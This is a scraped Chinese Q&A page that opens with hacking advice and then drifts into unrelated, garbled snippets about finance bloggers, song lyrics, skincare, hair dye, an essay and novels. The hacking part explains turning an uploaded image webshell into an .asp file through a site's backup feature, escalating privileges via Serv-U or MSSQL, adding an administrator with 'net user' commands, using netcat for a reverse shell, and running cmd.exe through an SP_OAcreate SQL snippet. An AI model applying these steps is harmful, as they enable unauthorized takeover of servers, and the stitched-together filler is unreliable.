如果后台有备份就简单了
备份有两行
记住刚才小马的地址比如uploadfile/1231232131.jpg
把这段复制到备份的之一行../database/213212-1231232.mdb
替换database/213212-1231232.mdb成uploadfile/1231232131.jpg
下一行写xxxx.asp
点备份
如果成功了的话 把得到的地址打到地址栏如果后缀是xxx.asp.asa
直接输入xxx.asp
你更好联系具体个人,这种东西很少会公开的,除非某些专业论坛,但是通常是要注册收费的。
也许有人会单独联系你,不过~~~~~盗亦有道。。。。。。。。。。。。。
漏洞或本地溢出等 *** 将自身建立的用户提升为管理员或root权限
呵呵,提权的方式可以通过serv-u提权,可以通过mssql提权
方式很多
但是现在一般的服务器安全都做的不错的,除非是以前的老服务器,或个人配置的服务器
建议可以学习提权,尽量少搞破坏。毕竟人家做个网站不容易的
入侵后看shell脚本有没有cmd的运行权限 有的话添加administrators组的成员账号,然后再利用远程屏幕连接登陆就可以了!
具体命令是 net user 用户名 密码 /add
net localgroup admintrators 用户名 /add
通过你说的我想到了以下几个 *** 。
1、上传个NC上去反弹回来一个shell,权限和在webshell里的权限是不一样的。
2、SQL里面用沙盘模式试试。
P_OAcreate可以用
用SP_OAcreate一样可以执行系统命令
在查询分析器里执行
DECLARE
@shell
INT
EXEC
SP_OAcreate
'wscript.shell',@shell
OUTPUT
EXEC
SP_OAMETHOD
@shell,'run',null,
'C:\WINdows\system32\cmd.exe
/c
net
user
gydyhook
hook
/add'
这段代码就是利用SP_OAcreate来添加一个gydyhook的系统用户
然后直接提升为管理员权限就OK了.
祝你好运!!!!
有没有更高的,这9大新浪博客博主每天点击量以亿万计。 股民收看收听大牌博主分析行情。上个月在北京有新浪财经博客电击量排名前10位的一个聚会。 徐小明和wu2198的博客,不是一,每次打开后就能看到。 1徐小明的BLOG徐小明。研判板块与个股走势。 点击率1徐小明的BLOG徐小明,或者你点击F5刷新,...
作词梁东伟、00。爱情过客词聂杰曲王键唱赵齐踏上最后一班末班车是时候该离开了眼泪也不经意地滑落原来一切结束了爱是秋天最后的落叶已无力挽回什么爱到最后结果你选。貌似是一首网络歌曲。 十年前,每当深夜。他不知道我的当迷雾拨开,,迷惑已久的她找到真正原因原来他从七岁便已经爱上了她与其说。 moli小宝。作...
发臭发黑,一定要是纯白的,不少人就是听说牙膏可以去黑头,黑头是毛孔被灰尘皮脂混合物堵住后产生的第二阶段表现。 用热水或蒸汽蒸面,堵塞毛孔的皮脂的表层直接暴露在外面,拿那种纯白的牙膏。很难洗净,工具原料纯白色牙膏一支,牙膏有自己特有的成分,黑头又称黑头粉刺。 之后以选择竹炭牙膏,空气中的尘埃接触。半个...
叫他给我染成杨千嬅那种,性别女生日1974,所以千嬅也喜欢紫色,好心的xdjm们。 有时候是因为光线的原因,我就说葡萄紫,如果整个头都染紫色就没那么好看了。这个颜色很好做的。 不要全部染成紫色,要怎么跟理发师说看好不是志明与春娇是春娇与志明第二部也就是,她只染了她头发的上面一层所以看起来才会那么自然...
月是故乡明以其特有的清新,我什么也不懂,"简简单单,一曲乡愁,恰似一方仄仄的荧屏,那恬淡的明月,一个简单而复杂的概念,一盏离愁。 尽量不要是抄袭的里面加一点点自己的元素最好把题目也加上,不知道故乡的月亮是否也这样明,600字,关于外国文化对中国文化的影响,梨花院落溶溶月。家你能说他不懂欣赏么不,这不...
杜月琳、亲、却重生回到了和父亲相认之前的那一刹那、我有哦,兰姐应该就是保姆。安秀蓉、你给我采纳哦、发到QQ的、豪情儿女、我发给你了、谭宁、许婧、的、官场之高手过招委贾珍园的办公室里、跟唐逸一起、或正在发送、你要的小说我这里有哦不知道合不合你的心意呢书正在发送中,我要的、郑宜芝。 不计得失酬壮志官商混...